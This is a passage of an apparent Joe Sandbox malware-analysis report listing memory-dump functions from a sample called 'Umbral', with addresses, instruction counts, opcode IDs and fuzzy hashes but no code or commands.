                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 254068a933e9c02c1028c929e23575cea532d60e3b32105f55a121048a577918
                                        • Instruction ID: fc4bc5d3a984727f88646aba4d126595ded18e416b1e854a727acc436bd5a6d0
                                        • Opcode Fuzzy Hash: 254068a933e9c02c1028c929e23575cea532d60e3b32105f55a121048a577918
                                        • Instruction Fuzzy Hash: 51314631A1DB494FE71976386C160B53BD1FF46790F4401BEE489C31D3EF28AC02829A
                                        Function 00007FF848E8A6D8 Relevance: .1, Instructions: 136COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5175a74d8b6f4f096057d5536ffa3ba41c79062cba2971a7019f7a937038d37
                                        • Instruction ID: 7d1ae8a811afad37629c2b84adf4f0e38b3cf6da62a3bef4510cc83143213925
                                        • Opcode Fuzzy Hash: f5175a74d8b6f4f096057d5536ffa3ba41c79062cba2971a7019f7a937038d37
                                        • Instruction Fuzzy Hash: 1A417030A1CA198FDA58FB08D0419B977E1FF98350F50016DE44A872A2CB39FC828B99
                                        Function 00007FF848E8A285 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 451def38ad808a22048d15b9f871f4a25af297204fa3b54b0c87f32cbb5c98c4
                                        • Instruction ID: d054a76fd2172c1292dbe49d998ab5e97719b65d99d462730b84ea7e2c317fe3
                                        • Opcode Fuzzy Hash: 451def38ad808a22048d15b9f871f4a25af297204fa3b54b0c87f32cbb5c98c4
                                        • Instruction Fuzzy Hash: 71312731A1CA095FD759EB2C8855675B7D1FF99350B0441BAD00EC3183DE24A8928784
                                        Function 00007FF848E8B6B5 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 243e200ed3d5db1573a6e62f4bea8f2f1a7ae9666c2a4150722a650f680d97c3
                                        • Instruction ID: 8eb55b7ab285930c71a7eaf5e44fb1c4862c84ebf540c262f85c4864e8cb7eb1
                                        • Opcode Fuzzy Hash: 243e200ed3d5db1573a6e62f4bea8f2f1a7ae9666c2a4150722a650f680d97c3
                                        • Instruction Fuzzy Hash: 09312A21A0CA452ED70DFA6CA4465FE77D0FFD5360F5450BFE08A831D7DE25A846838A
                                        Function 00007FF848E87999 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee56a78fc5d2723c4b818a03f2ee0425022235a07307fcbae83727c9ac87a49e
                                        • Instruction ID: 2c88a5d93801d0162bed7345d3777f58973a3568630418509f21ca27fba5b8b6
                                        • Opcode Fuzzy Hash: ee56a78fc5d2723c4b818a03f2ee0425022235a07307fcbae83727c9ac87a49e
                                        • Instruction Fuzzy Hash: BB318A30A1DA464FE359AA25885403D7BE2FF96740F9445BFC48AC72D7DF38A8818354
                                        Function 00007FF848E932D8 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b078b7c45037ae908f96492a39ecadaf30a941ececca22f3a32c2285c8b4330f
                                        • Instruction ID: 6e942044b4d7983eae6218dfd4adc565f3cf78bbe2312f16f3c4faa1b0407e83
                                        • Opcode Fuzzy Hash: b078b7c45037ae908f96492a39ecadaf30a941ececca22f3a32c2285c8b4330f
                                        • Instruction Fuzzy Hash: 1941827294EAD66FD707A778E8611E43F70EF43255B0C51F7C088CA0A3CE29644AC795
                                        Function 00007FF848E8A2A8 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a9802f968ba867e1ea53a088f7702a6acc065cd491f329db27cb32b2382083b
                                        • Instruction ID: 3ee61e223046fd4991045da05b64703d6aa53243bc001d2495a9cdb1b126071c
                                        • Opcode Fuzzy Hash: 9a9802f968ba867e1ea53a088f7702a6acc065cd491f329db27cb32b2382083b
                                        • Instruction Fuzzy Hash: 2A413730608A084FD6A8EB2CD498B6937D1FF59751F4500BAE48EC72A6DE25EC85C785
                                        Function 00007FF848E8A350 Relevance: .1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4db7abde04e6a93111f68f74d66ea4eca3f942479314e838b6b8e19ae2bd7f5a
                                        • Instruction ID: 4b7fd37a8b5edda46032850a546546099d556bb9cd1d9c767699a0d264991b07
                                        • Opcode Fuzzy Hash: 4db7abde04e6a93111f68f74d66ea4eca3f942479314e838b6b8e19ae2bd7f5a
                                        • Instruction Fuzzy Hash: 3F317121B1CE1A4FEBA8F56D949967527C1FBBD7A1F1001BAD80DC3396DE25AC424388
                                        Function 00007FF848E7DE98 Relevance: .1, Instructions: 126COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 752eeb5f80953468a715a71e6060cefafadef90c70d8ef265cbddcfcb285d687
                                        • Instruction ID: 4d12f312ef47c7d3ab830d034d1c26ffe2d551f4671ce2dbf3cd327fa52a4981
                                        • Opcode Fuzzy Hash: 752eeb5f80953468a715a71e6060cefafadef90c70d8ef265cbddcfcb285d687
                                        • Instruction Fuzzy Hash: D0411C6248E7C24FD353837098355927FB0AE93224B0E46EFD4C0CF4A3E1495A4AC363
                                        Function 00007FF848EA2A30 Relevance: .1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e847a5b8ba1742ccd05f991f9f2237ad38bc95a872cc6cfa07413a1f66e7e7cd
                                        • Instruction ID: 2847a414a0ceaf25d8364aa56eba6e9354d6bdf6cf7bde9c89b2a2f3ea19928a
                                        • Opcode Fuzzy Hash: e847a5b8ba1742ccd05f991f9f2237ad38bc95a872cc6cfa07413a1f66e7e7cd
                                        • Instruction Fuzzy Hash: E731D631B1D8094FEAE4FA2C685877563D2FFAC790F4401B6D60EC7296EE29DC468740
                                        Function 00007FF848E90B2D Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e50f5f70cde04be24b57d7923142fe9a3c911bd9fd20e8f0aff41d6b2549d267
                                        • Instruction ID: 8093c8db5d5bceb0308ea387fc731123a3458299a9602b35120e94039a6c9f08
                                        • Opcode Fuzzy Hash: e50f5f70cde04be24b57d7923142fe9a3c911bd9fd20e8f0aff41d6b2549d267
                                        • Instruction Fuzzy Hash: 44310331A1DE861FD76ABA2C94414B677E0FF66350B0441BFD04EC31E7DE29A84A8399
                                        Function 00007FF848E88448 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d85f6c3b2264efa6e4066b920068601ab92b04acd2a9c08dc1f9ce7852116cfb
                                        • Instruction ID: 5587907f8b2ac8215375daf1066ac5956603bbd5e639994ca2369b4c59e81a14
                                        • Opcode Fuzzy Hash: d85f6c3b2264efa6e4066b920068601ab92b04acd2a9c08dc1f9ce7852116cfb
                                        • Instruction Fuzzy Hash: 1D410270608A4E8FDB88EF28C494AA973E2FF98345B605569D81EC7295CF31E852CB40
                                        Function 00007FF848E8B6E8 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7672857b31d3d8d5e02740ac1bc6912b682cf8edfaf1ea463a36b5e51c1b56cc
                                        • Instruction ID: e166ae9aed8771871a0c6a6e27c439bb999cc54539f73e18ba13eeb481b398b1
                                        • Opcode Fuzzy Hash: 7672857b31d3d8d5e02740ac1bc6912b682cf8edfaf1ea463a36b5e51c1b56cc
                                        • Instruction Fuzzy Hash: 15312431A0CE412EE74CE61CA4425FA77D0FFA9364F0450BEF08E831D7DE25A846439A
                                        Function 00007FF848E8D13C Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e05270d596523596be8a77d9c2e6699e43d91004e572b5b0804d6a9d027ce1f
                                        • Instruction ID: 83e27e4a6aba4fcd0f41ef1e52f31494607710ce3055dfacd6d1524470c42310
                                        • Opcode Fuzzy Hash: 6e05270d596523596be8a77d9c2e6699e43d91004e572b5b0804d6a9d027ce1f
                                        • Instruction Fuzzy Hash: FD214D62E1DD8A2FE759B63868555F937A0FF96760F0402FBD00DC3087EE29AD068395
                                        Function 00007FF848E70640 Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d474fe1c67e31602dc8b800b9c941e532c5a47fbe9c3fc07a7e0bb247a7f74a4
                                        • Instruction ID: c24c1b19ad0c5a03752aaead1e610db9dfa1595a8663c977dfcd14860f1bff18
                                        • Opcode Fuzzy Hash: d474fe1c67e31602dc8b800b9c941e532c5a47fbe9c3fc07a7e0bb247a7f74a4
                                        • Instruction Fuzzy Hash: CA312921E0DD8A5FEB48BB7C58156B9BBD1FF55350F0841BAD04DC31C7DE2858058755
                                        Function 00007FF848E8D169 Relevance: .1, Instructions: 109COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 387f3bd03dfd59cf1bf93f805721707f6cdb8f95e73ba4b2f300904636bdfcb1
                                        • Instruction ID: 0b32b1b522875701931d856216e21529b90d49d772aad65d8ad7f721d1b42429
                                        • Opcode Fuzzy Hash: 387f3bd03dfd59cf1bf93f805721707f6cdb8f95e73ba4b2f300904636bdfcb1
                                        • Instruction Fuzzy Hash: D7217C52E5DDC62FE7596238285A5F93BD0EF96660F0802FBD049C3087EE1D9C078351
                                        Function 00007FF848E77569 Relevance: .1, Instructions: 109COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65954b2cf9d598f24b6a41a5d2641bbeb8edf3d2c8cf4f541b8a3871708e8de0
                                        • Instruction ID: a8098ecb1d5e42e0f1bfad01caffb08ff53255e7c4ec3c4534a8139184ac5ff8
                                        • Opcode Fuzzy Hash: 65954b2cf9d598f24b6a41a5d2641bbeb8edf3d2c8cf4f541b8a3871708e8de0
                                        • Instruction Fuzzy Hash: C631F222E0D98A4FEB49AB7C48192B5BBE1FF95350F0801FBD04DC71D7DE2898068752
                                        Function 00007FF848E8A1F8 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e4f720e7acda00c0534923fb28b4a791b922966dcd2eb3148b7dfcaa584ff5a
                                        • Instruction ID: 89f69551d547321bc7996cb9d62035f3e1450b6a140812d00af699d0af9930c0
                                        • Opcode Fuzzy Hash: 7e4f720e7acda00c0534923fb28b4a791b922966dcd2eb3148b7dfcaa584ff5a
                                        • Instruction Fuzzy Hash: E121A731B1C91A0FF3A8E51CB84A6B573D1FBA5665F14017BD44DC3159EE26AC524284
                                        Function 00007FF848ECCB78 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f13a859e5a29d9c8dcfae89b849cf837300bf7290518dd7107c67984c63c345
                                        • Instruction ID: 7cb605a2453e54b41f59923f4765ab95bcac35eff13753967154c8f7632206d3
                                        • Opcode Fuzzy Hash: 6f13a859e5a29d9c8dcfae89b849cf837300bf7290518dd7107c67984c63c345
                                        • Instruction Fuzzy Hash: 4B315A7161CE1A8FDBA4EA1DD085A66B3E0FFA9350F500179E44EC36A2DB34FC458B84
                                        Function 00007FF848E77AE0 Relevance: .1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0337da4ef71c65300fa08fc651246f345c99337943bdaf8f42e2ae806694d713
                                        • Instruction ID: 73dcc4a0c60f0be658c2df16ada2d48c1e8aca1bba814469fe579c129c60d68b
                                        • Opcode Fuzzy Hash: 0337da4ef71c65300fa08fc651246f345c99337943bdaf8f42e2ae806694d713
                                        • Instruction Fuzzy Hash: 1631CF21E1CA8A8FEB95FB6888116B97BB2FF45780F4404F6D449C71E3CF38A9048355
                                        Function 00007FF848E88B20 Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 210dfb6d1fd28e380fd48aa2d734076465878482cb208e2f3ee62883bb88ce56
                                        • Instruction ID: 609c5c09ec3f363450b33f1d30fcf600d255c3421295ec225e97335eb8799c23
                                        • Opcode Fuzzy Hash: 210dfb6d1fd28e380fd48aa2d734076465878482cb208e2f3ee62883bb88ce56
                                        • Instruction Fuzzy Hash: D631473060CA498FDBA4FB28C444B6573E1FFA9355F5005B9E84EC72A6CB75E881C744
                                        Function 00007FF848E77580 Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be3638eb82625026f98ea3d616b913899ba310083e341fc5c3778783d051576d
                                        • Instruction ID: 764ac720569bfeb99d3f4e3074f127cea9cf53c24b86a658f16337e563c5b535
                                        • Opcode Fuzzy Hash: be3638eb82625026f98ea3d616b913899ba310083e341fc5c3778783d051576d
                                        • Instruction Fuzzy Hash: FC31F721F19C8A5FEB88BB7C98196B5B7D1FF94790F0842BAD04DC71C7DE2898028751
                                        Function 00007FF848E806AA Relevance: .1, Instructions: 103COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ebce0baefe141bb18cd2203c361674c87b9a65089b98c939a210136e77ddc47
                                        • Instruction ID: b454079500d39eaf21c00b7ac4740c2aadc8a22a641c3ecda8e3049f8a06773b
                                        • Opcode Fuzzy Hash: 0ebce0baefe141bb18cd2203c361674c87b9a65089b98c939a210136e77ddc47
                                        • Instruction Fuzzy Hash: C1212236C0C95E0EF7B4B66458012FD73E0FFA5390F840176D81CC3082DF3A291A4AA9
                                        Function 00007FF848E88333 Relevance: .1, Instructions: 102COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b48dd04150eae31d5c6ac8afb9e0177c990d067aa96360669cc486dd4759f38
                                        • Instruction ID: d7b39bd88979a4f2c0bbc7b5f333f6ebedac3db0b84aafeca8db5bbd238f75c9
                                        • Opcode Fuzzy Hash: 7b48dd04150eae31d5c6ac8afb9e0177c990d067aa96360669cc486dd4759f38
                                        • Instruction Fuzzy Hash: 4831FE74A1995E8FDBC4EF18C494AA977E2FF58340F5446A4E41DC729ADF34E842CB40
                                        Function 00007FF848E90334 Relevance: .1, Instructions: 99COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3de77c9bd8aaf5f4c862960e2f3c876d22970b65c0540f1b52da89e2b25b3fd
                                        • Instruction ID: 3c030d7e8eb2847726ae519374acf7d521ce9ca9b47230a1038aacad7bdaef28
                                        • Opcode Fuzzy Hash: a3de77c9bd8aaf5f4c862960e2f3c876d22970b65c0540f1b52da89e2b25b3fd
                                        • Instruction Fuzzy Hash: 3D31052150EBCA4FD793FBA884505A27FE1FF67264B4941FAC04CCB153CA68AC4AC351
                                        Function 00007FF848EBCE10 Relevance: .1, Instructions: 99COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a229fc5f4ba1c12d1e73e988fac4d4936bc91d67a143780d68fce89bf9e8f3fc
                                        • Instruction ID: 30af3f727802f8e721503e1e9da3a73a41bf56bfa47ce48ac5de379016609fc2
                                        • Opcode Fuzzy Hash: a229fc5f4ba1c12d1e73e988fac4d4936bc91d67a143780d68fce89bf9e8f3fc
                                        • Instruction Fuzzy Hash: F921A521B1CD064FEAA4E65E64D537953C3FFA8691F4401BBD41CC3299DF39EC428285
                                        Function 00007FF848EB03F0 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68bc5bc0e2753363682e262670bc96039baad8fe9bf932db584f128cbbea2c6a
                                        • Instruction ID: 2372f04679672414628dd5f990483a74736b6fa398dccb3da6815047478d52a9
                                        • Opcode Fuzzy Hash: 68bc5bc0e2753363682e262670bc96039baad8fe9bf932db584f128cbbea2c6a
                                        • Instruction Fuzzy Hash: A921C321F2CD4A4FEAE8F62D5445A7663C1FBA87A4F4405BAD00EC3696CE28BC464384
                                        Function 00007FF848E89442 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 899db497471488bc4e814faf02dc421963b2837424c3096eb388b18e3a0f7cda
                                        • Instruction ID: 9ee6e2533bca354325e4a613e97db23d42650eaaa32d40bf6dbd4a567f71ba5b
                                        • Opcode Fuzzy Hash: 899db497471488bc4e814faf02dc421963b2837424c3096eb388b18e3a0f7cda
                                        • Instruction Fuzzy Hash: 38212911D1DA861FE32B627824511B97BD1EF472A0F5802FAD4C9C30D7DD1D68064365
                                        Function 00007FF848E78191 Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d592da858de8cd1c4d18b6a613d1457625f861b4bdcdbcbc13c4bd3db9db4058
                                        • Instruction ID: 6748ff6034e0906e71223b91c25446211948f7fd866e0aff07ea1f76b6a5115b
                                        • Opcode Fuzzy Hash: d592da858de8cd1c4d18b6a613d1457625f861b4bdcdbcbc13c4bd3db9db4058
                                        • Instruction Fuzzy Hash: C2212F21A9DA994FE781B77898252F53BE1EF96350F0901F6E04CC71A3DE2C58078755
                                        Function 00007FF848E8B930 Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b0d04ef009c0cb28cf534b276556999584f260a198e0d29776a62d01380ae6dd
                                        • Instruction ID: 39a56845351d28f6bd937bc248d347dd6c3ad42e7ce5053ca1754651e475663a
                                        • Opcode Fuzzy Hash: b0d04ef009c0cb28cf534b276556999584f260a198e0d29776a62d01380ae6dd
                                        • Instruction Fuzzy Hash: D221F931A0CF181FE658B61D984A47A73D0FB987A1F00027EE44AC3261EE34B88247C6
                                        Function 00007FF848E897E9 Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7b5ff7b2ad7a0eeffa601970183cf50be65c47d53bf7f6dc5c81424aa45c054
                                        • Instruction ID: 53e586d08d67950b9e79f820d67193e215c0698da0022e1a7b5e2e32058a4473
                                        • Opcode Fuzzy Hash: b7b5ff7b2ad7a0eeffa601970183cf50be65c47d53bf7f6dc5c81424aa45c054
                                        • Instruction Fuzzy Hash: 64318430D0DB9E9FD796AB3888152A8BBB0FF0E350F8505FAD409DB1A3DB3919848755
                                        Function 00007FF848E7164A Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 631c86b03b51990f103ecb6486438fddb1c27023245d9967f942de22f0eed328
                                        • Instruction ID: 960b7f4dd5ffcb95cf00d5bd86941bc1d13642d3ad638ad0b0c636265766aacc
                                        • Opcode Fuzzy Hash: 631c86b03b51990f103ecb6486438fddb1c27023245d9967f942de22f0eed328
                                        • Instruction Fuzzy Hash: 0D21C531B1CE5E4FE694B67C545A675B7D2EB896A4F0401FAE40DC3293DE289C428385
                                        Function 00007FF848E889F7 Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
